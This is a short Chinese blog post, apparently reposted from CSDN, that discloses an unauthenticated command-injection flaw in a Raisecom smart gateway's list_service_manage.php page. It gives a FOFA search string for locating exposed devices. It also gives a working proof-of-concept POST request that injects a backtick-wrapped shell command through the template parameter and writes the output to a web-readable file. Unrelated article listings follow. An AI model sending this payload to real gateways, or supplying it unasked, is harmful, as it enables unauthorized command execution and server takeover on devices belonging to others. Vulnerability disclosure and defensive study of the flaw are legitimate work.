首页 > 其他分享 >某智能网关 list_service_manage存在命令执行漏洞

某智能网关 list_service_manage存在命令执行漏洞

时间:2024-09-12 18:49:54浏览次数:12  
标签:智能网 service manage list 漏洞 php

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

body="/images/raisecom/back.gif"

漏洞复现

poc

POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

 

 访问文件url+/tmp/1.txt获取命令回显

 

 

标签:智能网,service,manage,list,漏洞,php
From: https://blog.csdn.net/weixin_45790890/article/details/142077972

相关文章

  • 22753 Cost Management and Analysis
    22753CostManagementandAnalysis:AssignmentBrief1.AssignmentOverviewYouareaconsultanthiredbytheChiefFinancialOfficer(CFO)ofyourassignedorganization.Youhavebeenaskedtoprepareareporttoaddressissuesrelatedtoproductcosting......
  • SOMEIP_ETS_105: SD_ClientServiceGetLastValueOfEventUDPUnicast
    测试目的:验证DUT在客户端服务模式下能够订阅事件组,接收UINT8UDP单播事件,并在触发clientServiceGetLastValueOfEventUDPUnicast方法后返回该事件的值。描述本测试用例旨在确保DUT能够在客户端服务模式下正确地处理订阅和单播事件接收流程,并且能够通过特定的方法返回最近......
  • 5G Multicast/Broadcast Services(MBS) (三)Broadcast
    这篇是Broadcast的overview,正文开始。值得注意的是,对于5MBSbroadcast,UE处于RRCidle/RRC connected/Inactive时,网络侧都可以通过MRB将MBS广播数据传输到UE。对于Broadcast涉及的RNTI有G-RNTI以及MCCH-RNTI。1SessionManagement对于特定服务,将执行以下阶段:(1)MBS......
  • 【Azure Cloud Service】在Azure云服务中收集CPU监控指标和IIS进程的DUMP方法
    问题描述在使用CloudService服务时,发现服务的CPU占用很高,在业务请求并不大的情况下,需要直到到底是什么进程占用了大量的CPU资源,已经如何获取IIS进程(w3wp.exe)的DUMP文件? 问题解答一:收集云服务中CPU的性能数据远程登录(RDP)到云服务的实例上,使用管理员身份运行以下命令:Lo......
  • 理解Window和WIndowManager
    Window表示一个窗口的概念,在日常开发中直接接触Window的机会并不多,但是在某些特殊时候我们需要在桌面上显示一个类似悬浮窗的东西,那么这种效果就需要用到Window来实现。Window是一个抽象类,它的具体实现是PhoneWindow。创建一个Window是很简单的事,只需要通过WindowManager即......
  • NetworkManager内核网络栈通信机制
    NetworkManager在启动和配置网络设备时,会通过Linux内核的网络栈API与设备驱动程序进行交互,特别是通过netlink子系统来实现。1.Netlink通信机制Netlink是Linux内核与用户空间进程之间的一种通信机制,它允许用户空间进程与内核模块(如网络栈)交换信息。Netlink为Networ......
  • NetworkManager接收和处理客户端请求通信机制
    NetworkManager守护进程通过监听D-Bus通信来接收和处理来自客户端(如nmcli或其他应用程序)的请求。这是Linux中进程间通信(IPC)的一种常见方式。D-Bus是一个消息总线系统,允许应用程序在不直接通信的情况下,通过消息总线交换数据。NetworkManager使用D-Bus作为其主要的通信机......
  • 如何在 VPS 上使用 NVM(Node Version Manager)安装 Node.js
    前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站。介绍如果你已经知道Node.js是什么,它是用来做什么的,以及为什么它很酷,那么可以直接跳到安装说明。如果你想更多地了解Node及其生态系统,请继续阅读。对于那些还没有听说......
  • 基于Axis 1.4的Web Service入门
    最近有个客户使用的是Axis1.4创建的WebService,很久没用了,所以整理下这块的知识。基于JDK1.8和EclipseMars开发一个简单的HelloworldWebServicepublicinterfaceHelloService{ Stringhello(Stringname);}publicclassHelloServiceImplimplementsHelloService{......
  • 【Azure Service Bus】创建 ServiceBus 的Terraform脚本报错GetAuthorizationRule: In
    问题描述在使用Terraform部署ServiceBus时候,遇见了如下报错:Error:ErrormakingReadrequestonAzureServiceBusTopicAuthorizationRule:servicebus.TopicsClient#GetAuthorizationRule:Invalidinput:autorest/validation:validationfailed:parameter=authorization......